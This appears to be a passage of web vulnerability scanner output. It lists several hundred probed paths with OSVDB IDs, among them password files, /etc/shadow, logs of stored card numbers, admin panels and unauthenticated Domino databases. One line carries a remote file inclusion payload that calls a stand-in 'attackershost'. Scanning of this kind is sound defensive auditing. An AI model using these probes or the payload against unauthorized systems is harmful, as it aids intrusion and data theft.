4646+ OSVDB-3092: /Excel/: This might be interesting...
4647+ OSVDB-3092: /EXE/: This might be interesting...
4648+ OSVDB-3092: /exe/: This might be interesting...
4649+ OSVDB-3092: /fbsd/: This might be interesting...
4650+ OSVDB-3092: /file/: This might be interesting...
4651+ OSVDB-3092: /fileadmin/: This might be interesting...
4652+ OSVDB-3092: /files/: This might be interesting...
4653+ OSVDB-3092: /forum/: This might be interesting...
4654+ OSVDB-3092: /forums/: This might be interesting...
4655+ OSVDB-3092: /foto/: This might be interesting...
4656+ OSVDB-3092: /fotos/: This might be interesting...
4657+ OSVDB-3092: /fpadmin/: This might be interesting...
4658+ OSVDB-3092: /ftp/: This might be interesting...
4659+ OSVDB-3092: /gfx/: This might be interesting...
4660+ OSVDB-3092: /global/: This might be interesting...
4661+ OSVDB-3092: /graphics/: This might be interesting...
4662+ OSVDB-3092: /guest/: This might be interesting...
4663+ OSVDB-3092: /guestbook/: This might be interesting...
4664+ OSVDB-3092: /guests/: This might be interesting...
4665+ OSVDB-3092: /hidden/: This might be interesting...
4666+ OSVDB-3092: /hitmatic/: This might be interesting...
4667+ OSVDB-3092: /hitmatic/analyse.cgi: This might be interesting...
4668+ OSVDB-3092: /hit_tracker/: This might be interesting...
4669+ OSVDB-3092: /home/: This might be interesting...
4670+ OSVDB-3092: /homepage/: This might be interesting...
4671+ OSVDB-3092: /htdocs/: This might be interesting...
4672+ OSVDB-3092: /html/: This might be interesting...
4673+ OSVDB-3092: /htpasswd: This might be interesting...
4674+ OSVDB-3092: /HyperStat/stat_what.log: This might be interesting...
4675+ OSVDB-3092: /hyperstat/stat_what.log: This might be interesting...
4676+ OSVDB-3092: /ibill/: This might be interesting...
4677+ OSVDB-3092: /idea/: This might be interesting...
4678+ OSVDB-3092: /ideas/: This might be interesting...
4679+ OSVDB-3092: /imagenes/: This might be interesting...
4680+ OSVDB-3092: /imgs/: This might be interesting...
4681+ OSVDB-3092: /import/: This might be interesting...
4682+ OSVDB-3092: /impreso/: This might be interesting...
4683+ OSVDB-3092: /includes/: This might be interesting...
4684+ OSVDB-3092: /incoming/: This might be interesting...
4685+ OSVDB-3092: /info/: This might be interesting...
4686+ OSVDB-3092: /informacion/: This might be interesting...
4687+ OSVDB-3092: /information/: This might be interesting...
4688+ OSVDB-3092: /ingresa/: This might be interesting...
4689+ OSVDB-3092: /ingreso/: This might be interesting...
4690+ OSVDB-3092: /install/: This might be interesting...
4691+ OSVDB-3092: /internal/: This might be interesting...
4692+ OSVDB-3092: /intranet/: This might be interesting...
4693+ OSVDB-3092: /invitado/: This might be interesting...
4694+ OSVDB-3092: /invitados/: This might be interesting...
4695+ OSVDB-3092: /java/: This might be interesting...
4696+ OSVDB-3092: /jdbc/: This might be interesting...
4697+ OSVDB-3092: /job/: This might be interesting...
4698+ OSVDB-3092: /jrun/: This might be interesting...
4699+ OSVDB-3092: /lib/: This might be interesting...
4700+ OSVDB-3092: /library/: This might be interesting...
4701+ OSVDB-3092: /libro/: This might be interesting...
4702+ OSVDB-3092: /linux/: This might be interesting...
4703+ OSVDB-3092: /logfile: This might be interesting...
4704+ OSVDB-3092: /logfile/: This might be interesting...
4705+ OSVDB-3092: /logfiles/: This might be interesting...
4706+ OSVDB-3092: /logger/: This might be interesting...
4707+ OSVDB-3092: /logging/: This might be interesting...
4708+ OSVDB-3092: /login/: This might be interesting...
4709+ OSVDB-3092: /logs/: This might be interesting...
4710+ OSVDB-3092: /logs/access_log: This might be interesting...
4711+ OSVDB-3092: /logs/error_log: This might be interesting...
4712+ OSVDB-3092: /mail/: This might be interesting...
4713+ OSVDB-3092: /manage/cgi/cgiproc: This might be interesting...
4714+ OSVDB-3092: /marketing/: This might be interesting...
4715+ OSVDB-3092: /mbox: This might be interesting...
4716+ OSVDB-3092: /members/: This might be interesting...
4717+ OSVDB-3092: /message/: This might be interesting...
4718+ OSVDB-3092: /messaging/: This might be interesting...
4719+ OSVDB-3092: /ministats/admin.cgi: This might be interesting...
4720+ OSVDB-3092: /misc/: This might be interesting...
4721+ OSVDB-3092: /mkstats/: This might be interesting...
4722+ OSVDB-3092: /movimientos/: This might be interesting...
4723+ OSVDB-3092: /mp3/: This might be interesting...
4724+ OSVDB-3092: /mqseries/: This might be interesting...
4725+ OSVDB-3092: /msql/: This might be interesting...
4726+ OSVDB-3092: /msword/: This might be interesting...
4727+ OSVDB-3092: /Msword/: This might be interesting...
4728+ OSVDB-3092: /MSword/: This might be interesting...
4729+ OSVDB-3092: /NetDynamic/: This might be interesting...
4730+ OSVDB-3092: /NetDynamics/: This might be interesting...
4731+ OSVDB-3092: /netscape/: This might be interesting...
4732+ OSVDB-3092: /new: This may be interesting...
4733+ OSVDB-3092: /new/: This might be interesting...
4734+ OSVDB-3092: /news: This might be interesting...
4735+ OSVDB-3092: /noticias/: This might be interesting...
4736+ OSVDB-3092: /odbc/: This might be interesting...
4737+ OSVDB-3092: /officescan/cgi/jdkRqNotify.exe: This might be interesting...
4738+ OSVDB-3092: /old/: This might be interesting...
4739+ OSVDB-3092: /oracle: This might be interesting...
4740+ OSVDB-3092: /oradata/: This might be interesting...
4741+ OSVDB-3092: /order/: This might be interesting...
4742+ OSVDB-3092: /orders/: This might be interesting...
4743+ OSVDB-3092: /orders/checks.txt: This might be interesting...
4744+ OSVDB-3092: /orders/mountain.cfg: This might be interesting...
4745+ OSVDB-3092: /orders/orders.log: This might be interesting...
4746+ OSVDB-3092: /orders/orders.txt: This might be interesting...
4747+ OSVDB-3092: /outgoing/: This might be interesting...
4748+ OSVDB-3092: /ows/: This might be interesting... Oracle Web Services?
4749+ OSVDB-3092: /pages/: This might be interesting...
4750+ OSVDB-3092: /Pages/: This might be interesting...
4751+ OSVDB-3092: /passwd: This could be interesting...
4752+ OSVDB-3092: /passwdfile: This might be interesting...
4753+ OSVDB-3092: /password: This could be interesting...
4754+ OSVDB-3092: /passwords/: This might be interesting...
4755+ OSVDB-3092: /PDG_Cart/: This might be interesting...
4756+ OSVDB-3092: /perl5/: This might be interesting...
4757+ OSVDB-3092: /php/: This might be interesting...
4758+ OSVDB-3092: /pics/: This might be interesting...
4759+ OSVDB-3092: /piranha/secure/passwd.php3: This might be interesting...
4760+ OSVDB-3092: /pix/: This might be interesting...
4761+ OSVDB-3092: /poll: This might be interesting...
4762+ OSVDB-3092: /polls: This might be interesting...
4763+ OSVDB-3092: /porn/: This might be interesting...
4764+ OSVDB-3092: /pr0n/: This might be interesting...
4765+ OSVDB-3092: /privado/: This might be interesting...
4766+ OSVDB-3092: /private/: This might be interesting...
4767+ OSVDB-3092: /prod/: This might be interesting...
4768+ OSVDB-3092: /pron/: This might be interesting...
4769+ OSVDB-3092: /prueba/: This might be interesting...
4770+ OSVDB-3092: /pruebas/: This might be interesting...
4771+ OSVDB-3092: /pub/: This might be interesting...
4772+ OSVDB-3092: /public/: This might be interesting...
4773+ OSVDB-3092: /publica/: This might be interesting...
4774+ OSVDB-3092: /publicar/: This might be interesting...
4775+ OSVDB-3092: /publico/: This might be interesting...
4776+ OSVDB-3092: /purchase/: This might be interesting...
4777+ OSVDB-3092: /purchases/: This might be interesting...
4778+ OSVDB-3092: /python/: This might be interesting...
4779+ OSVDB-3092: /readme: This might be interesting...
4780+ OSVDB-3092: /register/: This might be interesting...
4781+ OSVDB-3092: /registered/: This might be interesting...
4782+ OSVDB-3092: /reports/: This might be interesting...
4783+ OSVDB-3092: /reseller/: This might be interesting...
4784+ OSVDB-3092: /restricted/: This might be interesting...
4785+ OSVDB-3092: /retail/: This might be interesting...
4786+ OSVDB-3092: /reviews/newpro.cgi: This might be interesting...
4787+ OSVDB-3092: /sales/: This might be interesting...
4788+ OSVDB-3092: /sample/: This might be interesting...
4789+ OSVDB-3092: /samples/: This might be interesting...
4790+ OSVDB-3092: /save/: This might be interesting...
4791+ OSVDB-3092: /scr/: This might be interesting...
4792+ OSVDB-3092: /scratch: This might be interesting...
4793+ OSVDB-3092: /scripts/weblog: This might be interesting...
4794+ OSVDB-3092: /secret/: This might be interesting...
4795+ OSVDB-3092: /sell/: This might be interesting...
4796+ OSVDB-3092: /service/: This might be interesting...
4797+ OSVDB-3092: /servicio/: This might be interesting...
4798+ OSVDB-3092: /servicios/: This might be interesting...
4799+ OSVDB-3092: /setup/: This might be interesting...
4800+ OSVDB-3092: /shop/: This might be interesting...
4801+ OSVDB-3092: /shopper/: This might be interesting...
4802+ OSVDB-3092: /solaris/: This might be interesting...
4803+ OSVDB-3092: /Sources/: This might be interesting... may be YaBB.
4804+ OSVDB-3092: /spwd: This might be interesting...
4805+ OSVDB-3092: /srchadm: This might be interesting...
4806+ OSVDB-3092: /staff/: This might be interesting...
4807+ OSVDB-3092: /stat/: This might be interesting...
4808+ OSVDB-3092: /statistic/: This might be interesting...
4809+ OSVDB-3092: /Statistics/: This might be interesting...
4810+ OSVDB-3092: /statistics/: This might be interesting...
4811+ OSVDB-3092: /stats/: This might be interesting...
4812+ OSVDB-3092: /Stats/: This might be interesting...
4813+ OSVDB-3092: /status/: This might be interesting...
4814+ OSVDB-3092: /store/: This might be interesting...
4815+ OSVDB-3092: /StoreDB/: This might be interesting...
4816+ OSVDB-3092: /stylesheet/: This might be interesting...
4817+ OSVDB-3092: /stylesheets/: This might be interesting...
4818+ OSVDB-3092: /subir/: This might be interesting...
4819+ OSVDB-3092: /sun/: This might be interesting...
4820+ OSVDB-3092: /super_stats/access_logs: This might be interesting...
4821+ OSVDB-3092: /super_stats/error_logs: This might be interesting...
4822+ OSVDB-3092: /support/: This might be interesting...
4823+ OSVDB-3092: /sys/: This might be interesting...
4824+ OSVDB-3092: /system/: This might be interesting...
4825+ OSVDB-3092: /tar/: This might be interesting...
4826+ OSVDB-3092: /tarjetas/: This might be interesting...
4827+ OSVDB-3092: /temp/: This might be interesting...
4828+ OSVDB-3092: /template/: This may be interesting as the directory may hold sensitive files or reveal system information.
4829+ OSVDB-3092: /temporal/: This might be interesting...
4830+ OSVDB-3092: /test/: This might be interesting...
4831+ OSVDB-3092: /testing/: This might be interesting...
4832+ OSVDB-3092: /tests/: This might be interesting...
4833+ OSVDB-3092: /tmp/: This might be interesting...
4834+ OSVDB-3092: /tools/: This might be interesting...
4835+ OSVDB-3092: /tpv/: This might be interesting...
4836+ OSVDB-3092: /trabajo/: This might be interesting...
4837+ OSVDB-3092: /trafficlog/: This might be interesting...
4838+ OSVDB-3092: /transito/: This might be interesting...
4839+ OSVDB-3092: /tree/: This might be interesting...
4840+ OSVDB-3092: /trees/: This might be interesting...
4841+ OSVDB-3092: /updates/: This might be interesting...
4842+ OSVDB-3092: /user/: This might be interesting...
4843+ OSVDB-3092: /users/: This might be interesting...
4844+ OSVDB-3092: /users/scripts/submit.cgi: This might be interesting...
4845+ OSVDB-3092: /ustats/: This might be interesting...
4846+ OSVDB-3092: /usuario/: This might be interesting...
4847+ OSVDB-3092: /usuarios/: This might be interesting...
4848+ OSVDB-3092: /vfs/: This might be interesting...
4849+ OSVDB-3092: /w3perl/admin: This might be interesting...
4850+ OSVDB-3092: /warez/: This might be interesting...
4851+ OSVDB-3092: /web/: This might be interesting...
4852+ OSVDB-3092: /web800fo/: This might be interesting...
4853+ OSVDB-3092: /webaccess/access-options.txt: This might be interesting...
4854+ OSVDB-3092: /webadmin/: This might be interesting...may be HostingController, www.hostingcontroller.com
4855+ OSVDB-3092: /webboard/: This might be interesting...
4856+ OSVDB-3092: /webcart-lite/: This might be interesting...
4857+ OSVDB-3092: /webcart/: This might be interesting...
4858+ OSVDB-3092: /webdata/: This might be interesting...
4859+ OSVDB-3092: /weblog/: This might be interesting...
4860+ OSVDB-3092: /weblogs/: This might be interesting...
4861+ OSVDB-3092: /webmaster_logs/: This might be interesting...
4862+ OSVDB-3092: /WebShop/: This might be interesting...
4863+ OSVDB-3092: /WebShop/logs/cc.txt: This might be interesting...
4864+ OSVDB-3092: /WebShop/templates/cc.txt: This might be interesting...
4865+ OSVDB-3092: /website/: This might be interesting...
4866+ OSVDB-3092: /webstats/: This might be interesting...
4867+ OSVDB-3092: /WebTrend/: This might be interesting...
4868+ OSVDB-3092: /Web_store/: This might be interesting...
4869+ OSVDB-3092: /windows/: This might be interesting...
4870+ OSVDB-3092: /word/: This might be interesting...
4871+ OSVDB-3092: /work/: This might be interesting...
4872+ OSVDB-3092: /wstats/: This might be interesting...
4873+ OSVDB-3092: /wusage/: This might be interesting...
4874+ OSVDB-3092: /www-sql/: This might be interesting...
4875+ OSVDB-3092: /www/: This might be interesting...
4876+ OSVDB-3092: /wwwboard/wwwboard.cgi: This might be interesting...
4877+ OSVDB-3092: /wwwboard/wwwboard.pl: This might be interesting...
4878+ OSVDB-3092: /wwwjoin/: This might be interesting...
4879+ OSVDB-3092: /wwwlog/: This might be interesting...
4880+ OSVDB-3092: /wwwstats/: This might be interesting...
4881+ OSVDB-3092: /wwwthreads/3tvars.pm: This might be interesting...
4882+ OSVDB-3092: /wwwthreads/w3tvars.pm: This might be interesting...
4883+ OSVDB-3092: /zipfiles/: This might be interesting...
4884+ OSVDB-13483: /adsamples/config/site.csc: Contains SQL username/password
4885+ OSVDB-3092: /advworks/equipment/catalog_type.asp: This might be interesting...
4886+ OSVDB-17670: /clocktower/: Site Server sample files. This might be interesting...
4887+ OSVDB-17670: /market/: Site Server sample files. This might be interesting.
4888+ OSVDB-17670: /mspress30/: Site Server sample files. This might be interesting...
4889+ OSVDB-3092: /sam: This might be interesting...
4890+ OSVDB-3092: /samples/search/queryhit.htm: This might be interesting...
4891+ OSVDB-3092: /scripts/counter.exe: This might be interesting...
4892+ OSVDB-17669: /scripts/cphost.dll: cphost.dll may have a DoS and a traversal issue.
4893+ OSVDB-3092: /scripts/fpadmcgi.exe: This might be interesting...
4894+ OSVDB-3092: /scripts/postinfo.asp: This might be interesting...
4895+ OSVDB-3092: /scripts/samples/ctguestb.idc: This might be interesting...
4896+ OSVDB-3092: /scripts/samples/search/webhits.exe: This might be interesting...
4897+ OSVDB-3092: /site/iissamples/: This might be interesting...
4898+ OSVDB-17670: /vc30/: Site Server sample files. This might be interesting...
4899+ OSVDB-3092: /_mem_bin/: This might be interesting - User Login
4900+ OSVDB-3092: /_mem_bin/FormsLogin.asp: This might be interesting - User Login
4901+ OSVDB-3092: /perl/files.pl: This might be interesting...
4902+ OSVDB-3092: /perl5/files.pl: This might be interesting...
4903+ OSVDB-3092: /scripts/convert.bas: This might be interesting...
4904+ OSVDB-3233: /cgi-dos/args.bat: Default FrontPage CGI found.
4905+ OSVDB-3092: /custdata/: This may be COWS (CGI Online Worldweb Shopping), and may be interesting...
4906+ OSVDB-3092: /hostingcontroller/: This might be interesting...probably HostingController, www.hostingcontroller.com
4907+ OSVDB-3092: /databases/: Databases? Really??
4908+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
4909+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
4910+ OSVDB-3092: /javadoc/: Documentation...?
4911+ OSVDB-3092: /log/: Ahh...log information...fun!
4912+ OSVDB-3092: /manager/: May be a web server or site manager.
4913+ OSVDB-3092: /manual/: Web server manual found.
4914+ OSVDB-3092: /exchange/: This may be interesting (Outlook exchange OWA server?)...
4915+ OSVDB-3092: /archive/a_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
4916+ OSVDB-3092: /archive/l_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
4917+ OSVDB-3092: /iNotes/Forms5.nsf: This database can be read without authentication, which may reveal sensitive information.
4918+ OSVDB-3092: /iNotes/Forms5.nsf/$DefaultNav: This database can be read without authentication, which may reveal sensitive information.
4919+ OSVDB-3092: /mail/adminisist.nsf: This database can be read without authentication, which may reveal sensitive information.
4920+ OSVDB-3092: /mtdata/mtstore.nsf: This database can be read without authentication, which may reveal sensitive information.
4921+ OSVDB-3092: /nntp/nd000000.nsf: This database can be read without authentication, which may reveal sensitive information.
4922+ OSVDB-3092: /nntp/nd000001.nsf: This database can be read without authentication, which may reveal sensitive information.
4923+ OSVDB-3092: /nntp/nd000002.nsf: This database can be read without authentication, which may reveal sensitive information.
4924+ OSVDB-3092: /nntp/nd000003.nsf: This database can be read without authentication, which may reveal sensitive information.
4925+ OSVDB-3092: /nntp/nd000004.nsf: This database can be read without authentication, which may reveal sensitive information.
4926+ OSVDB-3092: /quickplace/quickplace/main.nsf: This database can be read without authentication, which may reveal sensitive information.
4927+ OSVDB-3092: /quickstart/qstart50.nsf: This database can be read without authentication, which may reveal sensitive information.
4928+ OSVDB-3092: /quickstart/wwsample.nsf: This database can be read without authentication, which may reveal sensitive information.
4929+ OSVDB-3092: /sample/faqw46: This database can be read without authentication, which may reveal sensitive information.
4930+ OSVDB-3092: /sample/framew46: This database can be read without authentication, which may reveal sensitive information.
4931+ OSVDB-3092: /sample/pagesw46: This database can be read without authentication, which may reveal sensitive information.
4932+ OSVDB-3092: /sample/siregw46: This database can be read without authentication, which may reveal sensitive information.
4933+ OSVDB-3092: /sample/site1w4646: This database can be read without authentication, which may reveal sensitive information.
4934+ OSVDB-3092: /sample/site2w4646: This database can be read without authentication, which may reveal sensitive information.
4935+ OSVDB-3092: /sample/site3w4646: This database can be read without authentication, which may reveal sensitive information.
4936+ OSVDB-3093: /acartpath/signin.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
4937+ OSVDB-3093: /add_acl: This might be interesting... has been seen in web logs from an unknown scanner.
4938+ OSVDB-3093: /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
4939+ OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
4940+ OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
4941+ OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
4942+ OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
4943+ OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
4944+ OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
4945+ OSVDB-3093: /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
4946+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
4947+ OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
4948+ OSVDB-3093: /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
4949+ OSVDB-3093: /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
4950+ OSVDB-3093: /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
4951+ OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
4952+ OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
4953+ OSVDB-3093: /admin_t/include/aff_liste_langue.php: This might be interesting... has been seen in web logs from an unknown scanner.
4954+ OSVDB-3093: /adv/gm001-mc/: This might be interesting... has been seen in web logs from an unknown scanner.
4955+ OSVDB-3093: /approval/ts_app.htm: This might be interesting... has been seen in web logs from an unknown scanner.
4956+ OSVDB-3093: /b2-tools/gm-2-b2.php: This might be interesting... has been seen in web logs from an unknown scanner.
4957+ OSVDB-3093: /bandwidth/index.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
4958+ OSVDB-3093: /bin/common/user_update_passwd.pl: This might be interesting... has been seen in web logs from an unknown scanner.
4959+ OSVDB-3093: /biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
4960+ OSVDB-3093: /biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
4961+ OSVDB-3093: /board/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
4962+ OSVDB-3093: /board/philboard_admin.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
4963+ OSVDB-3093: /caupo/admin/admin_workspace.php: This might be interesting... has been seen in web logs from an unknown scanner.
4964+ OSVDB-3093: /ccbill/whereami.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
4965+ OSVDB-3093: /chat_dir/register.php: This might be interesting... has been seen in web logs from an unknown scanner.
4966+ OSVDB-3093: /community/forumdisplay.php: This might be interesting... has been seen in web logs from an unknown scanner.
4967+ OSVDB-3093: /community/index.php?analized=anything: This might be interesting... has been seen in web logs from an unknown scanner.
4968+ OSVDB-3093: /community/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
4969+ OSVDB-3093: /config/html/cnf_gi.htm: This might be interesting... has been seen in web logs from an unknown scanner.
4970+ OSVDB-3093: /cp/rac/nsManager.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
4971+ OSVDB-3093: /cutenews/comments.php: This might be interesting... has been seen in web logs from an unknown scanner.
4972+ OSVDB-3093: /cutenews/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
4973+ OSVDB-3093: /cutenews/shownews.php: This might be interesting... has been seen in web logs from an unknown scanner.
4974+ OSVDB-3093: /Data/settings.xml+: This might be interesting... has been seen in web logs from an unknown scanner.
4975+ OSVDB-3093: /database/metacart.mdb+: This might be interesting... has been seen in web logs from an unknown scanner.
4976+ OSVDB-3093: /dbabble: This might be interesting... has been seen in web logs from an unknown scanner.
4977+ OSVDB-3093: /dcp/advertiser.php: This might be interesting... has been seen in web logs from an unknown scanner.
4978+ OSVDB-3093: /doc/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
4979+ OSVDB-3093: /docs/NED: This might be interesting... has been seen in web logs from an unknown scanner.
4980+ OSVDB-3093: /dotproject/modules/files/index_table.php: This might be interesting... has been seen in web logs from an unknown scanner.
4981+ OSVDB-3093: /dotproject/modules/projects/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
4982+ OSVDB-3093: /dotproject/modules/projects/view.php: This might be interesting... has been seen in web logs from an unknown scanner.
4983+ OSVDB-3093: /dotproject/modules/projects/vw_files.php: This might be interesting... has been seen in web logs from an unknown scanner.
4984+ OSVDB-3093: /dotproject/modules/tasks/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
4985+ OSVDB-3093: /dotproject/modules/tasks/viewgantt.php: This might be interesting... has been seen in web logs from an unknown scanner.
4986+ OSVDB-3093: /do_map: This might be interesting... has been seen in web logs from an unknown scanner.
4987+ OSVDB-3093: /do_subscribe: This might be interesting... has been seen in web logs from an unknown scanner.
4988+ OSVDB-3093: /etc/shadow+: This might be interesting... has been seen in web logs from an unknown scanner.
4989+ OSVDB-3093: /ez2000/ezadmin.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
4990+ OSVDB-3093: /ez2000/ezboard.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
4991+ OSVDB-3093: /ez2000/ezman.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
4992+ OSVDB-3093: /faqman/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
4993+ OSVDB-3093: /filemanager/index.php3: This might be interesting... has been seen in web logs from an unknown scanner.
4994+ OSVDB-3093: /filemgmt/brokenfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
4995+ OSVDB-3093: /filemgmt/singlefile.php: This might be interesting... has been seen in web logs from an unknown scanner.
4996+ OSVDB-3093: /filemgmt/viewcat.php: This might be interesting... has been seen in web logs from an unknown scanner.
4997+ OSVDB-3093: /filemgmt/visit.php: This might be interesting... has been seen in web logs from an unknown scanner.
4998+ OSVDB-3093: /foro/YaBB.pl: This might be interesting... has been seen in web logs from an unknown scanner.
4999+ OSVDB-3093: /forum/mainfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
5000+ OSVDB-3093: /forum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
5001+ OSVDB-3093: /forum/newreply.php: This might be interesting... has been seen in web logs from an unknown scanner.
5002+ OSVDB-3093: /forum/newthread.php: This might be interesting... has been seen in web logs from an unknown scanner.
5003+ OSVDB-3093: /forum/viewtopic.php: phpBB found.
5004+ OSVDB-3093: /homebet/homebet.dll?form=menu&option=menu-signin: This might be interesting... has been seen in web logs from an unknown scanner.
5005+ OSVDB-3093: /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5006+ OSVDB-3093: /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5007+ OSVDB-3093: /include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
5008+ OSVDB-3093: /include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
5009+ OSVDB-3093: /includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
5010+ OSVDB-3093: /includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
5011+ OSVDB-3093: /infos/contact/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
5012+ OSVDB-3093: /infos/faq/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
5013+ OSVDB-3093: /infos/gen/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
5014+ OSVDB-3093: /infos/services/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
5015+ OSVDB-3093: /instaboard/index.cfm: This might be interesting... has been seen in web logs from an unknown scanner.
5016+ OSVDB-3093: /intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
5017+ OSVDB-3093: /kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
5018+ OSVDB-3093: /kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
5019+ OSVDB-3093: /livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5020+ OSVDB-3093: /mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
5021+ OSVDB-3093: /mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
5022+ OSVDB-3093: /mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
5023+ OSVDB-3093: /manage/login.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
5024+ OSVDB-3093: /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
5025+ OSVDB-3093: /members/ID.pm: This might be interesting... has been seen in web logs from an unknown scanner.
5026+ OSVDB-3093: /members/ID.xbb: This might be interesting... has been seen in web logs from an unknown scanner.
5027+ OSVDB-3093: /modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
5028+ OSVDB-3093: /modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
5029+ OSVDB-3093: /modules/Downloads/voteinclude.php+: This might be interesting... has been seen in web logs from an unknown scanner.
5030+ OSVDB-3093: /modules/Forums/attachment.php: This might be interesting... has been seen in web logs from an unknown scanner.
5031+ OSVDB-3093: /modules/Search/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5032+ OSVDB-3093: /modules/WebChat/in.php+: This might be interesting... has been seen in web logs from an unknown scanner.
5033+ OSVDB-3093: /modules/WebChat/out.php: This might be interesting... has been seen in web logs from an unknown scanner.
5034+ OSVDB-3093: /modules/WebChat/quit.php: This might be interesting... has been seen in web logs from an unknown scanner.
5035+ OSVDB-3093: /modules/WebChat/users.php: This might be interesting... has been seen in web logs from an unknown scanner.
5036+ OSVDB-3093: /modules/Your_Account/navbar.php+: This might be interesting... has been seen in web logs from an unknown scanner.
5037+ OSVDB-3093: /moregroupware/modules/webmail2/inc/: This might be interesting... has been seen in web logs from an unknown scanner.
5038+ OSVDB-3093: /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5039+ OSVDB-3093: /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5040+ OSVDB-3093: /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5041+ OSVDB-3093: /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5042+ OSVDB-3093: /netget?sid=Safety&msg=2002&file=Safety: This might be interesting... has been seen in web logs from an unknown scanner.
5043+ OSVDB-3093: /OpenTopic: This might be interesting... has been seen in web logs from an unknown scanner.
5044+ OSVDB-3093: /oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
5045+ OSVDB-3093: /php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5046+ OSVDB-3093: /php/php4ts.dll: This might be interesting... has been seen in web logs from an unknown scanner.
5047+ OSVDB-3093: /pks/lookup: This might be interesting... has been seen in web logs from an unknown scanner.
5048+ OSVDB-3093: /pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
5049+ OSVDB-3093: /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5050+ OSVDB-3093: /productcart/database/EIPC.mdb: This might be interesting... has been seen in web logs from an unknown scanner.
5051+ OSVDB-3093: /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5052+ OSVDB-3093: /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
5053+ OSVDB-3093: /prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5054+ OSVDB-3093: /protected/: This might be interesting... has been seen in web logs from an unknown scanner.
5055+ OSVDB-3093: /protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
